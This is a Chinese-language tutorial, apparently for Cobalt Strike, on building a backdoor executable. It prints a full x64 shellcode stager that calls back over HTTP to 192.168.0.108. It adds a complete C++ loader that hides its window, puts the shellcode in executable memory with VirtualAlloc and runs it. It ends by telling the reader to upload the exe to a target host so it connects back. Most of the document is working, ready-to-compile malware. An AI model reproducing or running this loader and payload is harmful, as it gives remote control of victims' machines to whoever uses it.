0x01 payload生成器利用
1、点击攻击,选择生成后门,选择Payload生成器
2、可以生成多种语言的payload,C、C#、Java、Python都可以,我们以C语言为例
3、点击生成,选择要保存的位置
4、里面的代码如下
/* length: 892 bytes */ unsigned char buf[] = "\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x75\x72\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x4f\xff\xff\xff\x5d\x6a\x00\x49\xbe\x77\x69\x6e\x69\x6e\x65\x74\x00\x41\x56\x49\x89\xe6\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x48\x31\xc9\x48\x31\xd2\x4d\x31\xc0\x4d\x31\xc9\x41\x50\x41\x50\x41\xba\x3a\x56\x79\xa7\xff\xd5\xeb\x73\x5a\x48\x89\xc1\x41\xb8\xb8\x22\x00\x00\x4d\x31\xc9\x41\x51\x41\x51\x6a\x03\x41\x51\x41\xba\x57\x89\x9f\xc6\xff\xd5\xeb\x59\x5b\x48\x89\xc1\x48\x31\xd2\x49\x89\xd8\x4d\x31\xc9\x52\x68\x00\x02\x40\x84\x52\x52\x41\xba\xeb\x55\x2e\x3b\xff\xd5\x48\x89\xc6\x48\x83\xc3\x50\x6a\x0a\x5f\x48\x89\xf1\x48\x89\xda\x49\xc7\xc0\xff\xff\xff\xff\x4d\x31\xc9\x52\x52\x41\xba\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x85\x9d\x01\x00\x00\x48\xff\xcf\x0f\x84\x8c\x01\x00\x00\xeb\xd3\xe9\xe4\x01\x00\x00\xe8\xa2\xff\xff\xff\x2f\x6e\x42\x77\x36\x00\x82\x6e\x1e\xcf\x3e\x87\x59\xae\x4a\x80\x62\x01\x09\x20\xcf\x39\x40\xc9\x64\xd9\xc5\xbe\x85\x13\x96\xfe\xae\xa1\xfb\x35\xf8\xdd\x95\xdd\x43\xed\x7e\x64\x5d\x4e\x43\xb8\x7a\xfb\xa4\xef\xbf\x9e\xf1\x1d\xc6\x19\x7d\xc5\x91\xb0\xf6\x54\x54\x83\x60\x4f\x5b\x6c\x45\xca\x16\xf5\x41\x3b\x7e\xad\x24\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x31\x30\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x31\x3b\x20\x57\x4f\x57\x36\x34\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x36\x2e\x30\x29\x0d\x0a\x00\x69\xe2\xf0\x30\x37\x74\xd0\xbb\xdf\x82\xbe\x66\xb8\x44\x17\x9b\xcc\x2c\x5e\x4f\xdc\xfd\xc9\x41\x62\x69\xe9\x41\x59\xea\xfd\x20\x69\x11\x22\xf1\xed\xa9\x5a\x31\xe1\x28\x8e\x8e\xc1\x53\x35\x92\xd8\xe4\x82\x32\xc3\xe3\xf3\x68\x1a\x47\xdf\x44\xa3\xa9\x8c\xcf\xaf\xa7\x3c\x34\x96\x15\x59\x0f\x18\xd2\xba\x52\xb7\x71\x54\xf5\x38\x38\x4f\xcc\xd6\xcf\x13\x14\xbf\xa0\xcd\xd4\xd4\xbc\xb6\x97\x2a\x93\xf9\xc4\x81\xbf\xfb\x5f\xe9\x6f\xb2\x2b\x80\x22\x59\x1f\x18\x43\x8d\x7d\x5d\x1a\x11\xe3\x3c\xed\x9a\x68\xd2\xeb\x93\x4d\x2b\xb4\x75\xa0\x99\x09\xdc\xab\x98\x24\x06\xbe\xdc\xd0\x93\x4b\xb3\x68\x60\x52\x76\x87\x7f\xb6\xf8\x86\xfc\x9d\x25\x0e\x0b\xf3\xe4\x76\x0a\xe5\xbf\x6c\x68\x15\x5b\x71\xe6\x4b\x3a\xcd\x02\x87\xeb\x84\xf6\x41\xfe\xde\x6f\x5a\x59\x0d\xcf\x79\x20\x8b\x14\x3a\x24\x7c\x57\xad\x5d\xb2\xbc\xfc\x40\xac\xe6\xec\xd4\x1c\x14\x09\x2f\x58\x05\x7c\xe9\x98\xde\x09\x94\x00\x41\xbe\xf0\xb5\xa2\x56\xff\xd5\x48\x31\xc9\xba\x00\x00\x40\x00\x41\xb8\x00\x10\x00\x00\x41\xb9\x40\x00\x00\x00\x41\xba\x58\xa4\x53\xe5\xff\xd5\x48\x93\x53\x53\x48\x89\xe7\x48\x89\xf1\x48\x89\xda\x41\xb8\x00\x20\x00\x00\x49\x89\xf9\x41\xba\x12\x96\x89\xe2\xff\xd5\x48\x83\xc4\x20\x85\xc0\x74\xb6\x66\x8b\x07\x48\x01\xc3\x85\xc0\x75\xd7\x58\x58\x58\x48\x05\x00\x00\x00\x00\x50\xc3\xe8\x9f\xfd\xff\xff\x31\x39\x32\x2e\x31\x36\x38\x2e\x30\x2e\x31\x30\x38\x00\x00\x0a\x2c\x2a";
5、打开VS2022,新建一个控制台应用程序
6、起名为Cpayload,选择项目的保存位置
7、利用C++加载代码,将生成的payload填写进去
#include <Windows.h> #include <iostream> #pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"") unsigned char shellcode[] = "\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x75\x72\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x4f\xff\xff\xff\x5d\x6a\x00\x49\xbe\x77\x69\x6e\x69\x6e\x65\x74\x00\x41\x56\x49\x89\xe6\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x48\x31\xc9\x48\x31\xd2\x4d\x31\xc0\x4d\x31\xc9\x41\x50\x41\x50\x41\xba\x3a\x56\x79\xa7\xff\xd5\xeb\x73\x5a\x48\x89\xc1\x41\xb8\xb8\x22\x00\x00\x4d\x31\xc9\x41\x51\x41\x51\x6a\x03\x41\x51\x41\xba\x57\x89\x9f\xc6\xff\xd5\xeb\x59\x5b\x48\x89\xc1\x48\x31\xd2\x49\x89\xd8\x4d\x31\xc9\x52\x68\x00\x02\x40\x84\x52\x52\x41\xba\xeb\x55\x2e\x3b\xff\xd5\x48\x89\xc6\x48\x83\xc3\x50\x6a\x0a\x5f\x48\x89\xf1\x48\x89\xda\x49\xc7\xc0\xff\xff\xff\xff\x4d\x31\xc9\x52\x52\x41\xba\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x85\x9d\x01\x00\x00\x48\xff\xcf\x0f\x84\x8c\x01\x00\x00\xeb\xd3\xe9\xe4\x01\x00\x00\xe8\xa2\xff\xff\xff\x2f\x6e\x42\x77\x36\x00\x82\x6e\x1e\xcf\x3e\x87\x59\xae\x4a\x80\x62\x01\x09\x20\xcf\x39\x40\xc9\x64\xd9\xc5\xbe\x85\x13\x96\xfe\xae\xa1\xfb\x35\xf8\xdd\x95\xdd\x43\xed\x7e\x64\x5d\x4e\x43\xb8\x7a\xfb\xa4\xef\xbf\x9e\xf1\x1d\xc6\x19\x7d\xc5\x91\xb0\xf6\x54\x54\x83\x60\x4f\x5b\x6c\x45\xca\x16\xf5\x41\x3b\x7e\xad\x24\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x31\x30\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x31\x3b\x20\x57\x4f\x57\x36\x34\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x36\x2e\x30\x29\x0d\x0a\x00\x69\xe2\xf0\x30\x37\x74\xd0\xbb\xdf\x82\xbe\x66\xb8\x44\x17\x9b\xcc\x2c\x5e\x4f\xdc\xfd\xc9\x41\x62\x69\xe9\x41\x59\xea\xfd\x20\x69\x11\x22\xf1\xed\xa9\x5a\x31\xe1\x28\x8e\x8e\xc1\x53\x35\x92\xd8\xe4\x82\x32\xc3\xe3\xf3\x68\x1a\x47\xdf\x44\xa3\xa9\x8c\xcf\xaf\xa7\x3c\x34\x96\x15\x59\x0f\x18\xd2\xba\x52\xb7\x71\x54\xf5\x38\x38\x4f\xcc\xd6\xcf\x13\x14\xbf\xa0\xcd\xd4\xd4\xbc\xb6\x97\x2a\x93\xf9\xc4\x81\xbf\xfb\x5f\xe9\x6f\xb2\x2b\x80\x22\x59\x1f\x18\x43\x8d\x7d\x5d\x1a\x11\xe3\x3c\xed\x9a\x68\xd2\xeb\x93\x4d\x2b\xb4\x75\xa0\x99\x09\xdc\xab\x98\x24\x06\xbe\xdc\xd0\x93\x4b\xb3\x68\x60\x52\x76\x87\x7f\xb6\xf8\x86\xfc\x9d\x25\x0e\x0b\xf3\xe4\x76\x0a\xe5\xbf\x6c\x68\x15\x5b\x71\xe6\x4b\x3a\xcd\x02\x87\xeb\x84\xf6\x41\xfe\xde\x6f\x5a\x59\x0d\xcf\x79\x20\x8b\x14\x3a\x24\x7c\x57\xad\x5d\xb2\xbc\xfc\x40\xac\xe6\xec\xd4\x1c\x14\x09\x2f\x58\x05\x7c\xe9\x98\xde\x09\x94\x00\x41\xbe\xf0\xb5\xa2\x56\xff\xd5\x48\x31\xc9\xba\x00\x00\x40\x00\x41\xb8\x00\x10\x00\x00\x41\xb9\x40\x00\x00\x00\x41\xba\x58\xa4\x53\xe5\xff\xd5\x48\x93\x53\x53\x48\x89\xe7\x48\x89\xf1\x48\x89\xda\x41\xb8\x00\x20\x00\x00\x49\x89\xf9\x41\xba\x12\x96\x89\xe2\xff\xd5\x48\x83\xc4\x20\x85\xc0\x74\xb6\x66\x8b\x07\x48\x01\xc3\x85\xc0\x75\xd7\x58\x58\x58\x48\x05\x00\x00\x00\x00\x50\xc3\xe8\x9f\xfd\xff\xff\x31\x39\x32\x2e\x31\x36\x38\x2e\x30\x2e\x31\x30\x38\x00\x00\x0a\x2c\x2a";; void main() { LPVOID Memory = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); if (Memory == NULL) { return; } memcpy(Memory, shellcode, sizeof(shellcode)); ((void(*)())Memory)(); }
8、点击生成,选择生成解决方案
9、将生成的exe文件上传到目标主机,双击运行,成功上线
